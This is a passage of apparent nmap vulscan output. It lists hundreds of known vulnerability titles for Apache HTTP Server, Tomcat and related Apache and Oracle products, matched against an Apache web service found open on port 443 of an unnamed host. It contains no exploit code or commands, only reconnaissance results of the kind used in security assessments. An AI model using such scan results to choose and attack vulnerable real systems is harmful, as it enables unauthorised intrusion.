12417| [7930] Apache HTTP Server mod_ssl ssl_expr_eval_func_file() Overflow
12418| [7929] Apache HTTP Server mod_ssl ssl_engine_log.c mod_proxy Hook Function Remote Format String
12419| [7611] Apache HTTP Server mod_alias Local Overflow
12420| [7394] Apache Tomcat mod_jk Invalid Transfer-Encoding Chunked Field DoS
12421| [7203] Apache Tomcat source.jsp Traversal Arbitrary File Access
12422| [7039] Apache HTTP Server on Mac OS X HFS+ File System Access Bypass
12423| [6882] Apache mod_python Malformed Query String Variant DoS
12424| [6839] Apache HTTP Server mod_proxy Content-Length Overflow
12425| [6630] Apache Tomcat Java Server Pages (JSP) Engine WPrinterJob() DoS
12426| [6472] Apache HTTP Server mod_ssl ssl_util_uuencode_binary Remote Overflow
12427| [5821] Apache HTTP Server Multiple / GET Remote Overflow DoS
12428| [5580] Apache Tomcat Servlet Malformed URL JSP Source Disclosure
12429| [5552] Apache HTTP Server split-logfile Arbitrary .log File Overwrite
12430| [5526] Apache Tomcat Long .JSP URI Path Disclosure
12431| [5278] Apache Tomcat web.xml Restriction Bypass
12432| [5051] Apache Tomcat Null Character DoS
12433| [4973] Apache Tomcat servlet Mapping XSS
12434| [4650] mod_gzip for Apache HTTP Server Debug Mode Printf Stack Overflow
12435| [4649] mod_gzip for Apache HTTP Server Debug Mode Format String Overflow
12436| [4648] mod_gzip for Apache HTTP Server Debug Mode Race Condition
12437| [4568] mod_survey For Apache ENV Tags SQL Injection
12438| [4553] Apache HTTP Server ApacheBench Overflow DoS
12439| [4552] Apache HTTP Server Shared Memory Scoreboard DoS
12440| [4446] Apache HTTP Server mod_disk_cache Stores Credentials
12441| [4383] Apache HTTP Server Socket Race Condition DoS
12442| [4382] Apache HTTP Server Log Entry Terminal Escape Sequence Injection
12443| [4340] Apache Portable Runtime (APR) apr_psprintf DoS
12444| [4232] Apache Cocoon DatabaseAuthenticatorAction SQL Injection
12445| [4231] Apache Cocoon Error Page Server Path Disclosure
12446| [4182] Apache HTTP Server mod_ssl Plain HTTP Request DoS
12447| [4181] Apache HTTP Server mod_access IP Address Netmask Rule Bypass
12448| [4075] Apache HTTP Sever on Windows .var File Request Path Disclosure
12449| [4037] Apache HTTP Server on Cygwin Encoded GET Request Arbitrary File Access
12450| [3877] Apache-SSL SSLVerifyClient SSLFakeBasicAuth Client Certificate Forgery
12451| [3819] Apache HTTP Server mod_digest Cross Realm Credential Replay
12452| [3322] mod_php for Apache HTTP Server Process Hijack
12453| [3215] mod_php for Apache HTTP Server File Descriptor Leakage
12454| [2885] Apache mod_python Malformed Query String DoS
12455| [2749] Apache Cocoon view-source Sample File Traversal Arbitrary File Access
12456| [2733] Apache HTTP Server mod_rewrite Local Overflow
12457| [2672] Apache HTTP Server mod_ssl SSLCipherSuite Ciphersuite Downgrade Weakness
12458| [2613] Apache HTTP Server mod_cgi stderr Output Handling Local DoS
12459| [2149] Apache::Gallery Privilege Escalation
12460| [2107] Apache HTTP Server mod_ssl Host: Header XSS
12461| [1926] Apache HTTP Server mod_rewrite Crafted URI Rule Bypass
12462| [1833] Apache HTTP Server Multiple Slash GET Request DoS
12463| [1577] Apache HTTP Server mod_rewrite RewriteRule Expansion Arbitrary File Access
12464| [872] Apache Tomcat Multiple Default Accounts
12465| [862] Apache HTTP Server SSI Error Page XSS
12466| [859] Apache HTTP Server Win32 Crafted Traversal Arbitrary File Access
12467| [849] Apache Tomcat TroubleShooter Servlet Information Disclosure
12468| [845] Apache Tomcat MSDOS Device XSS
12469| [844] Apache Tomcat Java Servlet Error Page XSS
12470| [842] Apache HTTP Server mod_ssl ssl_compat_directive Function Overflow
12471| [838] Apache HTTP Server Chunked Encoding Remote Overflow
12472| [827] PHP4 for Apache on Windows php.exe Malformed Request Path Disclosure
12473| [775] Apache mod_python Module Importing Privilege Function Execution
12474| [769] Apache HTTP Server Win32 DOS Batch File Arbitrary Command Execution
12475| [756] Apache HTTP Server mod_ssl i2d_SSL_SESSION Function SSL Client Certificate Overflow
12476| [701] Apache HTTP Server Win32 ScriptAlias php.exe Arbitrary File Access
12477| [674] Apache Tomcat Nonexistent File Error Message Path Disclosure
12478| [637] Apache HTTP Server UserDir Directive Username Enumeration
12479| [623] mod_auth_pgsql for Apache HTTP Server User Name SQL Injection
12480| [582] Apache HTTP Server Multiviews Feature Arbitrary Directory Listing
12481| [562] Apache HTTP Server mod_info /server-info Information Disclosure
12482| [561] Apache Web Servers mod_status /server-status Information Disclosure
12483| [417] Apache HTTP Server on SuSE Linux /doc/packages Remote Information Disclosure
12484| [410] mod_perl for Apache HTTP Server /perl/ Directory Listing
12485| [404] Apache HTTP Server on SuSE Linux WebDAV PROPFIND Arbitrary Directory Listing
12486| [402] Apache HTTP Server on SuSE Linux cgi-bin-sdb Request Script Source Disclosure
12487| [379] Apache ASP module Apache::ASP source.asp Example File Arbitrary File Creation
12488| [377] Apache Tomcat Snoop Servlet Remote Information Disclosure
12489| [376] Apache Tomcat contextAdmin Arbitrary File Access
12490| [342] Apache HTTP Server for Windows Multiple Forward Slash Directory Listing
12491| [222] Apache HTTP Server test-cgi Arbitrary File Access
12492| [143] Apache HTTP Server printenv.pl Multiple Method CGI XSS
12493| [48] Apache HTTP Server on Debian /usr/doc Directory Information Disclosure
|_
139/tcp closed netbios-ssn
443/tcp open ssl/http Apache httpd
|_http-server-header: Apache
| vulscan: VulDB - https://vuldb.com:
12499| [141649] Apache OFBiz up to 16.11.05 Form Widget Freemarker Markup Code Execution
12500| [141648] Apache OFBiz up to 16.11.05 Application Stored cross site scripting
12501| [140386] Apache Commons Beanutils 1.9.2 BeanIntrospector unknown vulnerability
12502| [139708] Apache Ranger up to 1.2.0 Policy Import cross site scripting
12503| [139540] cPanel up to 60.0.24 Apache HTTP Server Key information disclosure
12504| [139386] Apache Tike up to 1.21 RecursiveParserWrapper Stack-based memory corruption
12505| [139385] Apache Tika 1.19/1.20/1.21 SAXParsers Hang denial of service
12506| [139384] Apache Tika up to 1.21 RecursiveParserWrapper ZIP File denial of service
12507| [139261] Apache Solr 8.2.0 DataImportHandler Parameter unknown vulnerability
12508| [139259] cPanel up to 68.0.26 WHM Apache Includes Editor information disclosure
12509| [139256] cPanel up to 68.0.26 WHM Apache Configuration Include Editor cross site scripting
12510| [139239] cPanel up to 70.0.22 Apache HTTP Server Log information disclosure
12511| [139141] Apache ActiveMQ Client up to 5.15.4 ActiveMQConnection.java ActiveMQConnection denial of service
12512| [139130] cPanel up to 73.x Apache HTTP Server Injection privilege escalation
12513| [138914] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 VM sql injection
12514| [138913] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 Block Argument privilege escalation
12515| [138912] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 Cookie sql injection
12516| [138816] Apache Storm up to 1.2.2 Logviewer Daemon Log information disclosure
12517| [138815] Apache Storm up to 1.2.2 UI Daemon Deserialization privilege escalation
12518| [138164] Oracle 2.7.0.1 Apache Log4j unknown vulnerability
12519| [138155] Oracle Agile Engineering Data Management 6.2.0/6.2.1 Apache Tomcat unknown vulnerability
12520| [138151] Oracle Transportation Management 6.3.7 Apache Tomcat unknown vulnerability
12521| [138149] Oracle Agile Engineering Data Management 6.2.0/6.2.1 Apache Commons FileUpload unknown vulnerability
12522| [138131] Oracle MICROS Retail XBRi Loss Prevention 10.8.0/10.8.1/10.8.2/10.8.3 Apache Tomcat unknown vulnerability
12523| [138129] Oracle Retail Xstore Point of Service 7.0/7.1 Apache HTTP Server denial of service
12524| [138123] Oracle Retail Order Management System 5.0 Apache Struts 1 unknown vulnerability
12525| [138122] Oracle Retail Order Broker 5.2/15.0 Apache Tomcat unknown vulnerability
12526| [138121] Oracle Retail Order Broker 5.2/15.0 Apache CXF unknown vulnerability
12527| [138112] Oracle Retail Integration Bus 15.0/16.0 Apache Commons FileUpload unknown vulnerability
12528| [138111] Oracle MICROS Retail XBRi Loss Prevention 10.8.0/10.8.1/10.8.2/10.8.3 Apache Commons FileUpload unknown vulnerability
12529| [138103] Oracle PeopleSoft Enterprise PeopleTools 8.55/8.56/8.57 Apache WSS4J information disclosure
12530| [138053] Oracle JD Edwards EnterpriseOne Tools 9.2 Apache Log4j unknown vulnerability
12531| [138036] Oracle Insurance Rules Palette 10.0/10.1/10.2/11.0 Apache Commons FileUpload unknown vulnerability
12532| [138035] Oracle Insurance Policy Administration J2EE 10.0/10.1/10.2/11.0 Apache Commons FileUpload unknown vulnerability
12533| [138034] Oracle Insurance Calculation Engine 9.7/10.0/10.1/10.2 Apache Commons FileUpload unknown vulnerability
12534| [138028] Oracle Identity Manager 11.1.2.3.0/12.2.1.3.0 Apache Log4j unknown vulnerability
12535| [138020] Oracle BI Publisher 11.1.1.9.0 Apache Tomcat unknown vulnerability
12536| [138019] Oracle BI Publisher (formerly XML Publisher) 11.1.1.9.0 Apache Tomcat unknown vulnerability
12537| [138017] Oracle Outside In Technology 8.5.4 Apache Commons FileUpload unknown vulnerability
12538| [138013] Oracle Outside In Technology 8.5.4 Apache Tomcat unknown vulnerability
12539| [138012] Oracle Outside In Technology 8.5.4 Apache HTTP Server unknown vulnerability
12540| [138009] Oracle Outside In Technology 8.5.4 Apache HTTP Server unknown vulnerability
12541| [138008] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 Apache Struts 1 denial of service
12542| [138007] Oracle WebCenter Sites 12.2.1.3.0 Apache Tomcat denial of service
12543| [138006] Oracle Enterprise Repository 12.1.3.0.0 Apache CXF denial of service
12544| [138000] Oracle WebCenter Sites 12.2.1.3.0 Apache Commons FileUpload unknown vulnerability
12545| [137999] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 Apache Commons FileUpload unknown vulnerability
12546| [137995] Oracle Hospitality Simphony 18.2.1 Apache WSS4J information disclosure
12547| [137987] Oracle FLEXCUBE Universal Banking up to 12.0.3/12.4.0/14.2.0 Apache Log4j unknown vulnerability
12548| [137981] Oracle Insurance IFRS 17 Analyzer 8.0.6/8.0.7 Apache Commons FileUpload unknown vulnerability
12549| [137980] Oracle Insurance Data Foundation 8.0.4/8.0.5/8.0.6/8.0.7 Apache Commons FileUpload unknown vulnerability
12550| [137979] Oracle 8.0.8 Apache Commons FileUpload unknown vulnerability
12551| [137973] Oracle 8.0.4/8.0.5/8.0.6/8.0.7 Apache Batik unknown vulnerability
12552| [137970] Oracle Financial Services Profitability Management 8.0.4/8.0.5/8.0.6/8.0.7 Apache ActiveMQ unknown vulnerability
12553| [137967] Oracle up to 8.0.7 Apache httpd unknown vulnerability
12554| [137966] Oracle 8.0.7/8.0.8 Apache Groovy unknown vulnerability
12555| [137965] Oracle Financial Services Liquidity Risk Management 8.0.1/8.0.2/8.0.4/8.0.5/8.0.6 Apache Commons FileUpload unknown vulnerability
12556| [137964] Oracle 8.0.4/8.0.5/8.0.6/8.0.7 Apache Log4j unknown vulnerability
12557| [137933] Oracle Banking Platform up to 2.7.1 Apache Tika unknown vulnerability
12558| [137926] Oracle Enterprise Manager for Fusion Middleware 13.2/13.3 Apache Commons FileUpload information disclosure
12559| [137924] Oracle Enterprise Manager Base Platform 12.1.0.5.0/13.2.0.0.0/13.3.0.0.0 Apache Commons FileUpload unknown vulnerability
12560| [137914] Oracle E-Business Suite up to 12.2.8 Apache ActiveMQ unknown vulnerability
12561| [137913] Oracle E-Business Suite up to 12.2.8 Apache ActiveMQ unknown vulnerability
12562| [137911] Oracle E-Business Suite up to 12.2.8 Apache HTTP Server unknown vulnerability
12563| [137910] Oracle E-Business Suite up to 12.2.8 Apache CXF information disclosure
12564| [137909] Oracle E-Business Suite up to 12.2.8 Apache Commons FileUpload unknown vulnerability
12565| [137905] Oracle Primavera Gateway 15.2/16.2/17.12/18.8 Apache Tika denial of service
12566| [137901] Oracle Primavera Unifier up to 18.8 Apache HTTP Server unknown vulnerability
12567| [137895] Oracle Instant Messaging Server 10.0.1.2.0 Apache Tika information disclosure
12568| [137894] Oracle EAGLE (Software) 46.5/46.6/46.7 Apache Tomcat information disclosure
12569| [137892] Oracle Online Mediation Controller 6.1 Apache Batik denial of service
12570| [137891] Oracle Interactive Session Recorder 6.0/6.1/6.2 Apache Tomcat unknown vulnerability
12571| [137885] Oracle Diameter Signaling Router (DSR) 8.0/8.1/8.2 Apache cxf unknown vulnerability
12572| [137882] Oracle Unified 8.0.0.2.0 Apache Commons FileUpload unknown vulnerability
12573| [137881] Oracle Online Mediation Controller 6.1 Apache Commons FileUpload unknown vulnerability
12574| [137880] Oracle Interactive Session Recorder 6.0/6.1/6.2 Apache Log4j unknown vulnerability
12575| [137879] Oracle Convergence 3.0.2 Apache Commons FileUpload unknown vulnerability
12576| [137876] Oracle Application Session Controller 3.7.1/3.8.0 Apache Commons FileUpload unknown vulnerability
12577| [137829] Apache Roller 5.2.3 Math Comment Authenticator Reflected cross site scripting
12578| [137736] Apache Kafka 0.11.0.0/2.1.0 ACL Validation Request privilege escalation
12579| [136858] MakerBot Replicator 5G Printer Apache HTTP Server information disclosure
12580| [136849] Analogic Poste.io 2.1.6 on Apache RoundCube logs/ information disclosure
12581| [136822] Apache Tomcat up to 8.5.40/9.0.19 Incomplete Fix CVE-2019-0199 Resource Exhaustion denial of service
12582| [136808] Apache Geode up to 1.8.0 Secure Mode privilege escalation
12583| [136646] Apache Allura up to 1.10.x Dropdown Selector Stored cross site scripting
12584| [136374] Apache HTTP Server up to 2.4.38 Slash Regular Expression unknown vulnerability
12585| [136373] Apache HTTP Server 2.4.34/2.4.35/2.4.36/2.4.37/2.4.38 HTTP2 Request Crash denial of service
12586| [136372] Apache HTTP Server up to 2.4.38 HTTP2 Request unknown vulnerability
12587| [136370] Apache Fineract up to 1.2.x sql injection
12588| [136369] Apache Fineract up to 1.2.x sql injection
12589| [135731] Apache Hadoop up to 2.8.4/2.9.1/3.1.0 yarn privilege escalation
12590| [135664] Apache Tomcat up to 7.0.93/8.5.39/9.0.0.17 SSI printenv Command cross site scripting
12591| [135663] Apache Camel up to 2.23.x JSON-lib Library XML Data XML External Entity
12592| [135661] Apache Roller up to 5.2.1/5.2.0 XML-RPC Interface XML File Server-Side Request Forgery
12593| [135402] Apache Zookeeper up to 3.4.13/3.5.0-alpha to 3.5.4-beta getACL() information disclosure
12594| [135270] Apache JSPWiki up to 2.11.0.M3 Plugin Link cross site scripting
12595| [135269] Apache JSPWiki up to 2.11.0.M3 InterWiki Link cross site scripting
12596| [135268] Apache JSPWiki up to 2.11.0.M3 Attachment cross site scripting
12597| [134527] Apache Karaf up to 4.2.4 Config Service directory traversal
12598| [134416] Apache Sanselan 0.97-incubator Loop denial of service
12599| [134415] Apache Sanselan 0.97-incubator Hang denial of service
12600| [134291] Apache Axis up to 1.7.8 Server-Side Request Forgery
12601| [134290] Apache UIMA DUCC up to 2.2.2 cross site scripting
12602| [134248] Apache Archiva up to 2.2.3 Artifact Upload directory traversal
12603| [134247] Apache Archiva up to 2.2.3 Artifact Upload directory traversal
12604| [134246] Apache Camel up to 2.19/2.21.3/2.22.2/2.23.0 directory traversal
12605| [134138] Apache Pluto 3.0.0/3.0.1 Chat Room Demo Portlet cross site scripting
12606| [133992] Apache Qpid Proton up to 0.27.0 Certificate Validation Man-in-the-Middle weak authentication
12607| [133977] Apache Zeppelin up to 0.7.x Stored cross site scripting
12608| [133976] Apache Zeppelin up to 0.7.x Cron Scheduler privilege escalation
12609| [133975] Apache Zeppelin up to 0.7.2 Session Fixation weak authentication
12610| [133444] Apache PDFbox 2.0.14 XML Parser XML External Entity
12611| [133573] Oracle FLEXCUBE Private Banking 2.0.0.0/2.2.0.1/12.0.1.0/12.0.3.0/12.1.0.0 Apache ActiveMQ unknown vulnerability
12612| [133407] Apache Tomcat up to 7.0.93/8.5.39/9.0.17 on Windows JRE Command Line Argument Code Execution
12613| [133315] Apache Airflow up to 1.10.2 HTTP Endpoint cross site request forgery
12614| [133314] Apache Airflow up to 1.10.2 Metadata Database cross site scripting
12615| [133290] Apache Tomcat up to 8.5.37/9.0.14 HTTP2 Stream Execution denial of service
12616| [133112] Apache HTTP Server up to 2.4.38 mod_auth_digest race condition privilege escalation
12617| [133111] Apache HTTP Server 2.4.37/2.4.38 mod_ssl Bypass privilege escalation
12618| [133092] Airsonic 10.2.1 org.apache.commons.lang.RandomStringUtils RecoverController.java java.util.Random weak authentication
12619| [132568] Apache JSPWiki up to 2.11.0.M2 URL User information disclosure
12620| [132567] Apache JSPWiki up to 2.11.0.M2 URL cross site scripting
12621| [132566] Apache ActiveMQ up to 5.15.8 MQTT Frame Memory denial of service
12622| [132565] Apache HBase up to 2.1.3 REST Server Request privilege escalation
12623| [132183] Apache Mesos up to pre-1.4.x Docker Image Code Execution
12624| [131988] Apache Karaf up to 4.2.2 kar Deployer directory traversal
12625| [131859] Apache Hadoop up to 2.9.1 privilege escalation
12626| [131479] Apache Solr up to 7.6 HTTP GET Request Server-Side Request Forgery
12627| [131446] Apache Solr up to 5.0.5/6.6.5 Config API HTTP POST Request Code Execution
12628| [131385] Apache Qpid Broker-J up to 6.x/7.0.6/7.1.0 AMQP Command Crash denial of service
12629| [131315] Apache Mesos up to pre-1.4.x Mesos Masters Rendering JSON Payload Recursion denial of service
12630| [131236] Apache Airflow up to 1.10.1 Metadata Database cross site scripting
12631| [130755] Apache JSPWiki up to 2.10.5 URL cross site scripting
12632| [130629] Apache Guacamole Cookie Flag weak encryption
12633| [130628] Apache Hadoop up to 3.0.0 HDFS information disclosure
12634| [130529] Apache Subversion 1.10.0/1.10.1/1.10.2/1.10.3/1.11.0 mod_dav_svn Directory Crash denial of service
12635| [130353] Apache Open Office up to 4.1.5 Document Loader String memory corruption
12636| [130341] Apache HTTP Server 2.4.37 mod_ssl Loop denial of service
12637| [130330] Apache HTTP Server up to 2.4.37 mod_session Expired privilege escalation
12638| [130329] Apache HTTP Server 2.4.37 mod_http2 Slowloris denial of service
12639| [130212] Apache Airflow up to 1.10.0 LDAP Auth Backend Certificate weak authentication
12640| [130123] Apache Airflow up to 1.8.2 information disclosure
12641| [130122] Apache Airflow up to 1.8.2 command injection cross site request forgery
12642| [130121] Apache Airflow up to 1.8.2 Webserver Object Code Execution
12643| [129717] Oracle Secure Global Desktop 5.4 Apache HTTP Server denial of service
12644| [129688] Oracle Tape Library ACSLS 8.4 Apache Log4j unknown vulnerability
12645| [129673] Oracle Retail Returns Management 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
12646| [129672] Oracle Retail Central Office 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
12647| [129671] Oracle Retail Back Office 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
12648| [129574] Oracle Outside In Technology 8.5.3/8.5.4 Apache Tomcat denial of service
12649| [129573] Oracle WebLogic Server 10.3.6.0 Apache HTTP Server denial of service
12650| [129563] Oracle Enterprise Repository 12.1.3.0.0 Apache Log4j unknown vulnerability
12651| [129555] Oracle Outside In Technology 8.5.3 Apache Batik denial of service
12652| [129551] Oracle Outside In Technology 8.5.3/8.5.4 Apache Commons FileUpload denial of service
12653| [129542] Oracle API Gateway 11.1.2.4.0 Apache Batik denial of service
12654| [129538] Oracle SOA Suite 12.1.3.0.0/12.2.1.3.0 Apache Batik unknown vulnerability
12655| [129519] Oracle Enterprise Manager Ops Center 12.2.2/12.3.3 Apache ActiveMQ unknown vulnerability
12656| [129508] Oracle Applications Manager up to 12.2.8 Apache Derby unknown vulnerability
12657| [129507] Oracle Mobile Field Service up to 12.2.8 Apache Log4j unknown vulnerability
12658| [129505] Oracle Email Center up to 12.2.8 Apache Log4j unknown vulnerability
12659| [129504] Oracle CRM Technical Foundation up to 12.2.8 Apache Commons FileUpload unknown vulnerability
12660| [129499] Oracle Partner Management up to 12.2.8 Apache Log4j unknown vulnerability
12661| [129498] Oracle Marketing up to 12.2.8 Apache Commons FileUpload unknown vulnerability
12662| [129480] Oracle Communications WebRTC Session Controller up to 7.1 Apache Batik unknown vulnerability
12663| [129479] Oracle Communications Diameter Signaling Router up to 8.2 Apache Batik unknown vulnerability
12664| [129474] Oracle Communications Diameter Signaling Router up to 8.2 Apache HTTP Server information disclosure
12665| [129472] Oracle Communications WebRTC Session Controller up to 7.1 Apache Struts 1 unknown vulnerability
12666| [129470] Oracle Communications Converged Application Server up to 7.0.0.0 Apache Struts 1 unknown vulnerability
12667| [129463] Oracle Communications WebRTC Session Controller up to 7.1 Apache Log4j unknown vulnerability
12668| [129461] Oracle Communications Services Gatekeeper up to 6.1.0.3.x Apache Commons Collections Fileupload unknown vulnerability
12669| [129460] Oracle Communications Service Broker 6.0 Apache Log4j unknown vulnerability
12670| [129459] Oracle Communications Policy Management up to 12.4 Apache Struts 2 unknown vulnerability
12671| [129458] Oracle Communications Online Mediation Controller 6.1 Apache Log4j unknown vulnerability
12672| [129457] Oracle Communications Diameter Signaling Router up to 8.2 Apache Commons Fileupload unknown vulnerability
12673| [129456] Oracle Communications Converged Application Server 6.1 Apache Log4j unknown vulnerability
12674| [128714] Apache Thrift Java Client Library up to 0.11.0 SASL Negotiation org.apache.thrift.transport.TSaslTransport unknown vulnerability
12675| [128713] Apache Thrift Node.js Static Web Server up to 0.11.0 directory traversal
12676| [128709] Apache Karaf up to 4.1.6/4.2.1 Features Deployer XMLInputFactory XML External Entity
12677| [128575] Apache NetBeans 9.0 Proxy Auto-Config Code Execution
12678| [128369] Apache Tika 1.8-1.19.1 SQLite3Parser Loop sql injection
12679| [128111] Apache NiFi 1.8.0 Template Upload Man-in-the-Middle cross site request forgery
12680| [128110] Apache NiFi 1.8.0 Cluster Request privilege escalation
12681| [128109] Apache NiFi 1.8.0 Error Page message-page.jsp Request Header cross site scripting
12682| [128108] Apache NiFi up to 1.7.x X-Frame-Options Header privilege escalation
12683| [128102] Apache Oozie up to 5.0.0 Workflow XML Impersonation spoofing
12684| [127994] WordPress up to 5.0.0 on Apache httpd MIME Restriction cross site scripting
12685| [127981] Apache OFBiz 16.11.01/16.11.02/16.11.03/16.11.04 HTTP Engine httpService GET Request privilege escalation
12686| [127161] Apache Hadoop 2.7.4/2.7.5/2.7.6 Incomplete Fix CVE-2016-6811 privilege escalation
12687| [127040] Loadbalancer.org Enterprise VA MAX up to 8.3.2 Apache HTTP Server Log cross site scripting
12688| [127007] Apache Spark Request Code Execution
12689| [126791] Apache Hadoop up to 0.23.11/2.7.6/2.8.4/2.9.1/3.0.2 ZIP File unknown vulnerability
12690| [126767] Apache Qpid Proton-J Transport 0.3 Certificate Verification Man-in-the-Middle weak authentication
12691| [126896] Apache Commons FileUpload 1.3.3 on LDAP Manager DiskFileItem File privilege escalation
12692| [126574] Apache Hive up to 2.3.3/3.1.0 Query privilege escalation
12693| [126573] Apache Hive up to 2.3.3/3.1.0 HiveServer2 privilege escalation
12694| [126564] Apache Superset up to 0.22 Pickle Library load Code Execution
12695| [126488] Apache Syncope up to 2.0.10/2.1.1 BPMN Definition xxe privilege escalation
12696| [126487] Apache Syncope up to 2.0.10/2.1.1 cross site scripting
| [126346] Apache Tomcat Path privilege escalation
| [125922] Apache Impala up to 3.0.0 ALTER privilege escalation
| [125921] Apache Impala up to 3.0.0 Queue Injection privilege escalation
| [125647] Oracle Agile Engineering Data Management 6.1.3/6.2.0/6.2.1 Install (Apache Tomcat) information disclosure
| [125617] Oracle Retail Returns Management 14.1 Apache Batik unknown vulnerability
| [125616] Oracle Retail Point-of-Service 13.4/14.0/14.1 Apache Batik unknown vulnerability
| [125614] Oracle Retail Central Office 14.1 Apache Batik unknown vulnerability
| [125613] Oracle Retail Back Office 13.3/13.4/14/14.1 Apache Batik unknown vulnerability
| [125599] Oracle Retail Open Commerce Platform 5.3.0/6.0.0/6.0.1 Apache Log4j unknown vulnerability
| [125569] Oracle PeopleSoft Enterprise PeopleTools 8.55/8.56 Apache HTTP Server information disclosure
| [125494] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat information disclosure
| [125447] Oracle Business Intelligence Enterprise Edition 11.1.1.7.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Apache Batik unknown vulnerability
| [125428] Oracle Identity Management Suite 11.1.2.3.0/12.2.1.3.0 Apache Log4j unknown vulnerability
| [125427] Oracle Identity Analytics 11.1.1.5.8 Apache Log4j unknown vulnerability
| [125424] Oracle API Gateway 11.1.2.4.0 Apache Log4j unknown vulnerability
| [125423] Oracle BI Publisher 11.1.1.7.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Apache Log4j unknown vulnerability
| [125383] Oracle up to 10.2.0 Apache Trinidad unknown vulnerability
| [125379] Oracle up to 10.1.x Apache Struts 1 cross site scripting
| [125377] Oracle up to 10.2.0 Apache Commons Collections unknown vulnerability
| [125376] Oracle Communications Application Session Controller up to 3.7.0 Apache Commons Collections unknown vulnerability
| [125375] Oracle Communications User Data Repository up to 12.1.x Apache Xerces memory corruption
| [125248] Apache ActiveMQ up to 5.15.5 Web-based Administration Console queue.jsp Parameter cross site scripting
| [125133] Apache Tika up to 1.19 XML Parser reset() denial of service
| [124877] Apache PDFbox up to 2.0.11 PDF File denial of service
| [124876] Apache Ranger up to 1.1.x UnixAuthenticationService Stack-based memory corruption
| [124791] Apache Tomcat up to 7.0.90/8.5.33/9.0.11 URL Open Redirect
| [124787] Apache Pony Mail 0.7/0.8/0.9 Statistics Generator Timestamp Data information disclosure
| [124447] Apache HTTP Server up to 2.4.34 SETTINGS Frame denial of service
| [124346] Apache Mesos pre-1.4.2/1.5.0/1.5.1/1.6.0 on Executor HTTP API String Comparison validation JSON Web Token information disclosure
| [124286] Apache Tika up to 1.18 IptcAnpaParser Loop denial of service
| [124242] Apache Tika up to 0.18 C:/evil.bat" Directory unknown vulnerability
| [124241] Apache Tika up to 0.18 XML Parser Entity Expansion denial of service
| [124191] Apache Karaf up to 3.0.8/4.0.8/4.1.0 WebConsole .../gogo/ weak authentication
| [124190] Apache Karaf up to 4.1.x sshd privilege escalation
| [124152] Apache Camel Mail up to 2.22.0 Path directory traversal
| [124143] Apache SpamAssassin up to 3.4.1 PDFInfo Plugin Code Execution
| [124134] Apache SpamAssassin up to 3.4.1 Scan Engine HTML::Parser Email denial of service
| [124095] PHP up to 5.6.37/7.0.31/7.1.21/7.2.9 Apache2 sapi_apache2.c php_handler cross site scripting
| [124024] Apache Mesos 1.4.x/1.5.0 libprocess JSON Payload denial of service
| [123814] Apache ActiveMQ Client up to 5.15.5 TLS Hostname Verification Man-in-the-Middle weak authentication
| [123393] Apache Traffic Server up to 6.2.2/7.1.3 ESI Plugin Config privilege escalation
| [123392] Apache Traffic Server 6.2.2 TLS Handshake Segmentation Fault denial of service
| [123391] Apache Traffic Server up to 6.2.2/7.1.3 Range Request Performance denial of service
| [123390] Apache Traffic Server up to 6.2.2/7.1.3 Request HTTP Smuggling privilege escalation
| [123369] Apache Traffic Server up to 6.2.2/7.1.3 ACL remap.config Request denial of service
| [123197] Apache Sentry up to 2.0.0 privilege escalation
| [123145] Apache Struts up to 2.3.34/2.5.16 Namespace Code Execution
| [123144] Apache Cayenne up to 4.1.M1 CayenneModeler XML File File Transfer privilege escalation
| [122981] Apache Commons Compress 1.7 ZipArchiveInputStream ZIP Archive denial of service
| [122889] Apache HTTP Server up to 2.2.31/2.4.23 mod_userdir HTTP Response Splitting privilege escalation
| [122800] Apache Spark 1.3.0 REST API weak authentication
| [122642] Apache Airflow up to 1.8.x 404 Page Reflected cross site scripting
| [122568] Apache Tomcat up to 8.5.31/9.0.9 Connection Reuse weak authentication
| [122567] Apache Axis 1.0./1.1/1.2/1.3/1.4 cross site scripting
| [122556] Apache Tomcat up to 7.0.86/8.0.51/8.5.30/9.0.7 UTF-8 Decoder Loop denial of service
| [122531] Apache Tomcat up to 7.0.88/8.0.52/8.5.31/9.0.9 WebSocket Client unknown vulnerability
| [122456] Apache Camel up to 2.20.3/2.21.0 XSD Validator XML External Entity
| [122455] Apache Tomcat Native up to 1.1.34/1.2.16 OSCP Revoked Certificate weak authentication
| [122454] Apache Tomcat Native up to 1.1.34/1.2.16 OSCP Responder Revoked Certificate weak authentication
| [122214] Apache Kafka up to 0.9.0.1/0.10.2.1/0.11.0.2/1.0.0 Broker Request Data Loss denial of service
| [122202] Apache Kafka up to 0.10.2.1/0.11.0.1 SASL Impersonation spoofing
| [122101] Docker Skeleton Runtime for Apache OpenWhisk Docker Action dockerskeleton:1.3.0 privilege escalation
| [122100] PHP Runtime for Apache OpenWhisk Docker Action action-php-v7.2:1.0.0 privilege escalation
| [122012] Apache Ignite up to 2.5 Serialization privilege escalation
| [121911] Apache Ambari up to 2.5.x/2.6.2 Log Message Credentials information disclosure
| [121910] Apache HTTP Server 2.4.33 mod_md HTTP Requests denial of service
| [121854] Oracle Tape Library ACSLS up to ACSLS 8.4.0-2 Apache Commons Collections unknown vulnerability
| [121752] Oracle Insurance Policy Administration 10.0/10.1/10.2/11.0 Apache Log4j unknown vulnerability
| [121370] Apache Spark up to 2.1.2/2.2.1/2.3.0 URL cross site scripting
| [121354] Apache CouchDB HTTP API Code Execution
| [121144] Apache LDAP API up to 1.0.1 SSL Filter information disclosure
| [121143] Apache Storm up to 0.10.2/1.0.6/1.1.2/1.2.1 Cluster privilege escalation
| [120436] Apache CXF Fediz up to 1.4.3 Application Plugin unknown vulnerability
| [120310] Apache PDFbox up to 1.8.14/2.0.10 AFMParser Loop denial of service
| [120168] Apache CXF weak authentication
| [120080] Apache Cassandra up to 3.11.1 JMX/RMI Interface RMI Request privilege escalation
| [120043] Apache HBase up to 1.2.6.0/1.3.2.0/1.4.4/2.0.0 Thrift 1 API Server weak authentication
